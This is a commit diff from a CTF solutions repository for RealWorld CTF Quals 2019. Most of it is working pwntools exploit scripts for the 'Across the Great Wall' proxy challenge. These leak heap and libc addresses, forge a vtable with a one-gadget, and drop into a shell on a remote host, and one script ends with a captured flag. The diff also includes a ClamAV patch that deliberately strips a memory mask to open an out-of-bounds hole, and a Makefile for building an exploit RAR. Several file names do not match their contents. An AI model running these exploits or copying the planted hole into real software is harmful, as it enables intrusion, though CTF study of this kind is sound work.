realworld-ctf-quals-2019

Author: david942j

README.md

@@ -178,6 +178,12 @@ These challenges are created by me so there're scripts for creating them.
 
 * frawler (pwn 500pts)
 
+## realworld-ctf-quals-2019
+
+* Across the Great Wall (pwn 378pts)
+* anti-antivirus (pwn 290pts)
+* faX senDeR (pwn 224pts)
+
 ## teaser-confidence-quals-2019
 
 * go-machine (rev 304pts)

realworld-ctf-quals-2019/across_the_great_wall/Across_the_Great_Wall.zip

@@ -0,0 +1,120 @@
+#!/usr/bin/env python2
+
+from pwn import *
+import sys
+import time
+import os
+import hashlib
+from Crypto.Cipher import AES
+
+local = True
+host = '127.0.0.1'
+if len(sys.argv) > 1 and sys.argv[1][0] == 'r':
+    local = False
+    host = '54.153.22.136'
+pp = 1
+def get_port():
+    global pp
+    if local:
+        #  pp = process('./shadow_server')#, env={'LD_PRELOAD': './libCoroutine.so'})
+        pp = remote('127.0.0.1', 31337)
+    else:
+        pp = remote(host, 3343)
+    s = pp.recvuntil('bind at ')
+    print(s)
+    return int(pp.recvline())
+
+aport = port = get_port()
+r = remote(host, port)
+context.arch = 'amd64'
+password = 'meiyoumima'
+
+def aes_encrypt(data, key, iv):
+    return AES.new(key, AES.MODE_CBC, iv).encrypt(data)
+
+def sha256(ary):
+    c = hashlib.sha256()
+    for a in ary:
+        c.update(a)
+    return c.digest()
+
+def aes_token(token, data_ary):
+    t = sha256([password, token])
+    key = t[0:16]
+    iv = t[16:32]
+    return aes_encrypt(''.join(data_ary), key, iv)
+
+#  context.log_level = 'debug'
+def enc_proto(data, bad_pad = False, bad_length = False):
+    data_size = len(data)
+    pad_size = 16 - data_size % 16
+    random_len = 0
+    length = 80 + data_size + pad_size + random_len
+    timestamp = int(time.time())
+    noise = os.urandom(8)
+    token = sha256([password, p64(timestamp), noise])[0:16]
+    log.info('token: ' + repr(token))
+    main_version = 1
+    padding = "\x00" * 10
+    for i in range(pad_size):
+        if bad_pad:
+            data = data + chr(128)
+        else:
+            data = data + chr(pad_size)
+    # random_len == 0
+    if bad_length:
+        length = 79
+    hash_sum = sha256([token, p64(timestamp), noise, p8(main_version), p32(length), p8(random_len), padding, "\x00" * 32, data])
+    final = aes_token(token, [p64(timestamp), noise, p8(main_version), p32(length), p8(random_len), padding, hash_sum, data])
+    return token + final
+r2 = remote(host, aport)
+def ip2int(addr):
+    return struct.unpack("!I", socket.inet_aton(addr))[0]
+ip = '127.0.0.1'
+port = 60011
+l = listen(port)
+r.send(enc_proto('\x01\x01\x01' + p32(ip2int(ip))[::-1] + p16(port)[::-1]))
+l.wait_for_connection()
+r.send(enc_proto('B' * 1024)) # , bad_pad=True))
+for i in range(10):
+    r.send(enc_proto(chr(0x65 + i) * 8, bad_pad=True))
+r.send(enc_proto('A' * 47, bad_pad=True))
+l.recvuntil('h' * 8 + '\x80' * 8)
+s = l.recvuntil('AAAAAAAAAA', drop=True)
+#  print(repr(s))
+heap = u64(s[0:8]) # - 0x16e18
+libc = u64(s[24:32]) - 0x3ebca0
+log.info('heap @ ' + hex(heap))
+log.info('libc @ ' + hex(libc))
+#  pause()
+port2 = port + 1
+l2 = listen(port2)
+#  context.log_level = 'debug'
+r2.send(enc_proto('\x01\x01\x03' + chr(len(ip)) + ip + p16(port2)[::-1]))
+l2.wait_for_connection()
+vtable = heap + 0x138
+call = heap+0x250
+magic = libc + 0xe585f # 0xfaceb00c # heap + 0x1c8
+l.close()
+r.close()
+tmp=[remote(host,aport)]
+r3=remote(host,aport)
+r2.send(enc_proto('A', bad_length=True))
+r2.send(
+        flat(magic, 0x51, 0x9,0xb,0xc,0xd,0xe,0xf,0x11,0x12)+
+        flat(0, 0x41, 0x1b,0x2c,0x3d,0x4e,0x5f)+
+        flat(0, 0x51, 0x9,call,0xc,0xd,0xe,0xf,0x11,0x12)+
+        flat(0, 0x41, 0x1b,0x2c,0x3d,0x4e,0x5f)+
+        ''
+        )
+
+#  pause()
+time.sleep(1)
+r2.send('A')
+r2.close()
+
+r3.send('AAAA')
+for a in tmp:
+    a.send('AAAA')
+context.log_level = 'debug'
+pp.interactive()

realworld-ctf-quals-2019/across_the_great_wall/local.shell.py

@@ -0,0 +1,111 @@
+#!/usr/bin/env python2
+
+from pwn import *
+import sys
+import time
+import os
+import hashlib
+from Crypto.Cipher import AES
+
+local = True
+host = '127.0.0.1'
+if len(sys.argv) > 1 and sys.argv[1][0] == 'r':
+    local = False
+    host = '54.153.22.136'
+pp = 1
+def get_port():
+    global pp
+    if local:
+        #  pp = process('./shadow_server')#, env={'LD_PRELOAD': './libCoroutine.so'})
+        pp = remote('127.0.0.1', 31337)
+    else:
+        pp = remote(host, 3343)
+    s = pp.recvuntil('bind at ')
+    print(s)
+    return int(pp.recvline())
+
+aport = port = get_port()
+r = remote(host, port)
+context.arch = 'amd64'
+password = 'meiyoumima'
+
+def aes_encrypt(data, key, iv):
+    return AES.new(key, AES.MODE_CBC, iv).encrypt(data)
+
+def sha256(ary):
+    c = hashlib.sha256()
+    for a in ary:
+        c.update(a)
+    return c.digest()
+
+def aes_token(token, data_ary):
+    t = sha256([password, token])
+    key = t[0:16]
+    iv = t[16:32]
+    return aes_encrypt(''.join(data_ary), key, iv)
+
+#  context.log_level = 'debug'
+def enc_proto(data, bad_pad = False, bad_length = False):
+    data_size = len(data)
+    pad_size = 16 - data_size % 16
+    random_len = 0
+    length = 80 + data_size + pad_size + random_len
+    timestamp = int(time.time())
+    noise = os.urandom(8)
+    token = sha256([password, p64(timestamp), noise])[0:16]
+    log.info('token: ' + repr(token))
+    main_version = 1
+    padding = "\x00" * 10
+    for i in range(pad_size):
+        if bad_pad:
+            data = data + chr(128)
+        else:
+            data = data + chr(pad_size)
+    # random_len == 0
+    if bad_length:
+        length = 79
+    hash_sum = sha256([token, p64(timestamp), noise, p8(main_version), p32(length), p8(random_len), padding, "\x00" * 32, data])
+    final = aes_token(token, [p64(timestamp), noise, p8(main_version), p32(length), p8(random_len), padding, hash_sum, data])
+    return token + final
+r2 = remote(host, aport)
+def ip2int(addr):
+    return struct.unpack("!I", socket.inet_aton(addr))[0]
+ip = '127.0.0.1'
+ip = os.environ['IP']
+port = 60011
+l = listen(port)
+r.send(enc_proto('\x01\x01\x01' + p32(ip2int(ip))[::-1] + p16(port)[::-1]))
+l.wait_for_connection()
+r.send(enc_proto('B' * 1024)) # , bad_pad=True))
+for i in range(10):
+    r.send(enc_proto(chr(0x65 + i) * 8, bad_pad=True))
+r.send(enc_proto('A' * 47, bad_pad=True))
+l.recvuntil('h' * 8 + '\x80' * 8)
+s = l.recvuntil('AAAAAAAAAA', drop=True)
+#  print(repr(s))
+heap = u64(s[0:8]) # - 0x16e18
+libc = u64(s[24:32]) - 0x3ebca0
+log.info('heap @ ' + hex(heap))
+log.info('libc @ ' + hex(libc))
+#  pause()
+port2 = port + 1
+l2 = listen(port2)
+#  context.log_level = 'debug'
+r2.send(enc_proto('\x01\x01\x03' + chr(len(ip)) + ip + p16(port2)[::-1]))
+l2.wait_for_connection()
+vtable = heap + 0x138
+call = heap+0x280
+magic = libc + 0xe585f # 0xfaceb00c # heap + 0x1c8
+tmp=[remote(host,aport)]
+r2.send(enc_proto('A', bad_length=True))
+r2.send(
+        flat(call, 0x51, magic, 0x51) * 100
+        )
+
+time.sleep(1)
+r2.send('A')
+r2.close()
+
+context.log_level = 'debug'
+pp.interactive()
+# rwctf{Across_the_Great_Wall_we_can_reach_every_corner_in_the_world_228f6bec172c}

realworld-ctf-quals-2019/across_the_great_wall/remote.shell.py

@@ -0,0 +1,17 @@
+# Add -DNEEDS_STRCHRNUL to end of CFLAGS if necessary
+CFLAGS	= -ggdb3 -O0 -march=native -std=gnu99 -Wall
+LDFLAGS	= $(CFLAGS)
+LDLIBS = -lz
+RARAS	= ./rarvmtools/raras
+RARLD	= ./rarvmtools/rarld
+
+%.ri: %.rs
+	cpp -Irarvmtools/stdlib < $< > $@
+
+%.ro: %.ri
+	$(RARAS) -o $@ $<
+
+%.rar: %.ro
+	$(RARLD) $< > $@
+
+all:   exp.rar

realworld-ctf-quals-2019/anti-antivirus/Makefile

@@ -0,0 +1,87 @@
+diff --git a/libclamunrar/unrar.c b/libclamunrar/unrar.c
+index ee850c2c6..45fcf1b2d 100644
+--- a/libclamunrar/unrar.c
++++ b/libclamunrar/unrar.c
+@@ -1088,9 +1088,9 @@ static int rar_unpack29(int fd, int solid, unpack_data_t *unpack_data)
+ 	
+ 		}
+ 	}
+-	if (retval) {
++	/* if (retval) { */
+ 		unp_write_buf(unpack_data);
+-	}
++	/* } */
+ 	return retval;
+ }
+ 
+diff --git a/libclamunrar/unrarvm.c b/libclamunrar/unrarvm.c
+index 813ec0867..93722be03 100644
+--- a/libclamunrar/unrarvm.c
++++ b/libclamunrar/unrarvm.c
+@@ -311,11 +311,13 @@ void rarvm_set_memory(rarvm_data_t *rarvm_data, unsigned int pos, uint8_t *data,
+ 	}
+ }
+ 
+-static unsigned int *rarvm_get_operand(rarvm_data_t *rarvm_data,
++/* static unsigned int *rarvm_get_operand(rarvm_data_t *rarvm_data, */
++static size_t *rarvm_get_operand(rarvm_data_t *rarvm_data,
+ 				struct rarvm_prepared_operand *cmd_op)
+ {
+ 	if (cmd_op->type == VM_OPREGMEM) {
+-		return ((unsigned int *)&rarvm_data->mem[(*cmd_op->addr+cmd_op->base) & RARVM_MEMMASK]);
++		/* return ((unsigned int *)&rarvm_data->mem[(*cmd_op->addr+cmd_op->base) & RARVM_MEMMASK]); */
++		return ((size_t *)&rarvm_data->mem[(*cmd_op->addr+cmd_op->base) /*& RARVM_MEMMASK*/]);
+ 	} else {
+ 		return cmd_op->addr;
+ 	}
+@@ -589,7 +591,8 @@ static int rarvm_execute_code(rarvm_data_t *rarvm_data,
+ {
+ 	int max_ops=25000000, i, SP;
+ 	struct rarvm_prepared_command *cmd;
+-	unsigned int value1, value2, result, divider, FC, *op1, *op2;
++	unsigned int value1, value2, result, divider, FC/*, *op1, *op2*/;
++	size_t *op1, *op2;
+ 	const int reg_count=sizeof(rarvm_data->R)/sizeof(rarvm_data->R[0]);
+ 	
+ 	rar_dbgmsg("in rarvm_execute_code\n");
+diff --git a/libclamunrar/unrarvm.h b/libclamunrar/unrarvm.h
+index 5babd6840..91caf44e1 100644
+--- a/libclamunrar/unrarvm.h
++++ b/libclamunrar/unrarvm.h
+@@ -56,10 +56,13 @@ enum rarvm_op_type {
+ };
+ 
+ struct rarvm_prepared_operand {
+-	unsigned int *addr;
++	// unsigned int *addr;
++	size_t *addr;
+ 	enum rarvm_op_type type;
+-	unsigned int data;
+-	unsigned int base;
++	// unsigned int data;
++	size_t data;
++	// unsigned int base;
++	size_t base;
+ };
+ 
+ struct rarvm_prepared_command {
+@@ -76,7 +79,8 @@ struct rarvm_prepared_program {
+ 	uint8_t *filtered_data;
+ 	long global_size, static_size;
+ 	int cmd_count;
+-	unsigned int init_r[7];
++	// unsigned int init_r[7];
++	size_t init_r[7];
+ 	unsigned int filtered_data_size;
+ };
+ 
+@@ -89,7 +93,8 @@ typedef struct rarvm_input_tag {
+ 
+ typedef struct rarvm_data_tag {
+ 	uint8_t *mem;
+-	unsigned int R[8];
++	// unsigned int R[8];
++	size_t R[8];
+ 	unsigned int Flags;
+ } rarvm_data_t;
+ 

realworld-ctf-quals-2019/anti-antivirus/challenge/clamd

@@ -0,0 +1,8 @@
+There is a patched [clamav](https://github.com/Cisco-Talos/clamav-devel)(commit id: `6c11e824a794770c469f3a46141d5ea7927b6ea6`) running on ubuntu:18.04.
+
+Everytime you upload your payloads, we will scan these with the following commands
+```bash
+clamdscan your_upload_file
+clamscan your_upload_file
+```
+Try to pwn this antivirus software.